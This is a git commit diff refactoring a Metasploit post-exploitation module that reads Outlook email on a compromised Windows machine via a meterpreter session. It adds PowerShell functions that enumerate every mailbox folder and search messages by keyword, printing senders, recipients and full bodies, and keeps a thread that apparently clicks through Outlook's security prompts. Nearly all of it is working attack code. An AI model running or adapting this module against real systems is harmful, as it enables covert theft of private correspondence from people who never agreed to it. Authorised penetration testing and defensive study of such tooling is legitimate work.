outlook post module fixes
This commit is contained in:
parent
7c62fa5c95
commit
9187a409ec
|
@ -0,0 +1,47 @@
|
|||
function GetSubfolders($root) {
|
||||
$folders = @()
|
||||
$folders += $root
|
||||
foreach ($folder in $root.Folders) {
|
||||
$folders += GetSubfolders($folder)
|
||||
}
|
||||
return $folders
|
||||
}
|
||||
|
||||
function List-Folder {
|
||||
Clear-host
|
||||
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
|
||||
$Outlook = New-Object -ComObject Outlook.Application
|
||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||
$account = $NameSpace.Folders
|
||||
$folders = @()
|
||||
foreach ($acc in $account) {
|
||||
foreach ($folder in $acc.Folders) {
|
||||
$folders += GetSubfolders($folder)
|
||||
}
|
||||
}
|
||||
$folders | FT FolderPath
|
||||
}
|
||||
|
||||
function Get-Emails {
|
||||
param ([String]$searchTerm,[String]$Folder)
|
||||
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
|
||||
$Outlook = New-Object -ComObject Outlook.Application
|
||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||
$account = $NameSpace.Folders
|
||||
$found = $false
|
||||
foreach ($acc in $account) {
|
||||
try {
|
||||
$Email = $acc.Folders.Item($Folder).Items
|
||||
$result = $Email | Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
|
||||
if($result) {
|
||||
$found = $true
|
||||
$result | Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
||||
}
|
||||
} catch {
|
||||
Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
|
||||
}
|
||||
}
|
||||
if(-Not $found) {
|
||||
Write-Host "Searchterm" $searchTerm "not found"
|
||||
}
|
||||
}
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
|
|||
'References' => [ 'URL', 'https://forsec.nl/2014/11/reading-outlook-using-metasploit' ],
|
||||
'Platform' => [ 'win' ],
|
||||
'Arch' => [ 'x86', 'x64' ],
|
||||
'SessionTypes' => [ 'meterpreter'],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Actions' => [
|
||||
[ 'LIST', { 'Description' => 'Lists all folders' } ],
|
||||
[ 'SEARCH', { 'Description' => 'Searches for an email' } ]
|
||||
|
@ -41,79 +41,31 @@ class Metasploit3 < Msf::Post
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def listBoxes
|
||||
# This function prints a listing of available mailbox folders
|
||||
psh_script = %Q|
|
||||
function GetSubfolders($root) {
|
||||
$folders = @()
|
||||
$folders += $root
|
||||
foreach ($folder in $root.Folders) {
|
||||
$folders += GetSubfolders($folder)
|
||||
}
|
||||
return $folders
|
||||
}
|
||||
function List-Folder {
|
||||
Clear-host
|
||||
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
|
||||
$Outlook = New-Object -ComObject Outlook.Application
|
||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||
$account = $NameSpace.Folders
|
||||
$folders = @()
|
||||
foreach ($acc in $account) {
|
||||
foreach ($folder in $acc.Folders) {
|
||||
$folders += GetSubfolders($folder)
|
||||
}
|
||||
}
|
||||
$folders \| FT FolderPath
|
||||
}
|
||||
List-Folder
|
||||
|
|
||||
def execute_outlook_script(command)
|
||||
base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "outlook.ps1"))
|
||||
psh_script = base_script << command
|
||||
compressed_script = compress_script(psh_script)
|
||||
cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
|
||||
while(d = cmd_out.channel.read)
|
||||
print ("#{d}")
|
||||
end
|
||||
currentidle = session.ui.idle_time
|
||||
print("\n")
|
||||
print_status("System has currently been idle for #{currentidle} seconds")
|
||||
vprint_status("System has currently been idle for #{currentidle} seconds")
|
||||
end
|
||||
|
||||
# This function prints a listing of available mailbox folders
|
||||
def listBoxes
|
||||
command = 'List-Folder'
|
||||
execute_outlook_script(command)
|
||||
end
|
||||
|
||||
def readEmails(folder,keyword,atrans,acftrans)
|
||||
# This functions reads Outlook using powershell scripts
|
||||
def readEmails(folder,keyword,atrans,acftrans)
|
||||
view = framework.threads.spawn("ButtonClicker", false) {
|
||||
clickButton(atrans,acftrans)
|
||||
}
|
||||
psh_script = %Q|
|
||||
function Get-Emails {
|
||||
param ([String]$searchTerm,[String]$Folder)
|
||||
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
|
||||
$Outlook = New-Object -ComObject Outlook.Application
|
||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||
$account = $NameSpace.Folders
|
||||
$found = $false
|
||||
foreach ($acc in $account) {
|
||||
try {
|
||||
$Email = $acc.Folders.Item($Folder).Items
|
||||
$result = $Email \| Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
|
||||
if($result) {
|
||||
$found = $true
|
||||
$result \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
||||
}
|
||||
} catch {
|
||||
Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
|
||||
}
|
||||
}
|
||||
if(-Not $found) {
|
||||
Write-Host "Searchterm" $searchTerm "not found"
|
||||
}
|
||||
}
|
||||
Get-Emails "#{keyword}" "#{folder}"
|
||||
|
|
||||
compressed_script = compress_script(psh_script)
|
||||
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
|
||||
while(d = cmd_out.channel.read)
|
||||
print ("#{d}")
|
||||
end
|
||||
command = "Get-Emails \"#{keyword}\" \"#{folder}\""
|
||||
execute_outlook_script(command)
|
||||
end
|
||||
|
||||
def clickButton(atrans,acftrans)
|
||||
|
@ -190,7 +142,7 @@ class Metasploit3 < Msf::Post
|
|||
case action.name
|
||||
when 'LIST'
|
||||
print_good('Available folders in the mailbox: ')
|
||||
listBoxes()
|
||||
listBoxes
|
||||
when 'SEARCH'
|
||||
readEmails(folder,keyword,atrans,acftrans)
|
||||
else
|
||||
|
|
Loading…
Reference in New Issue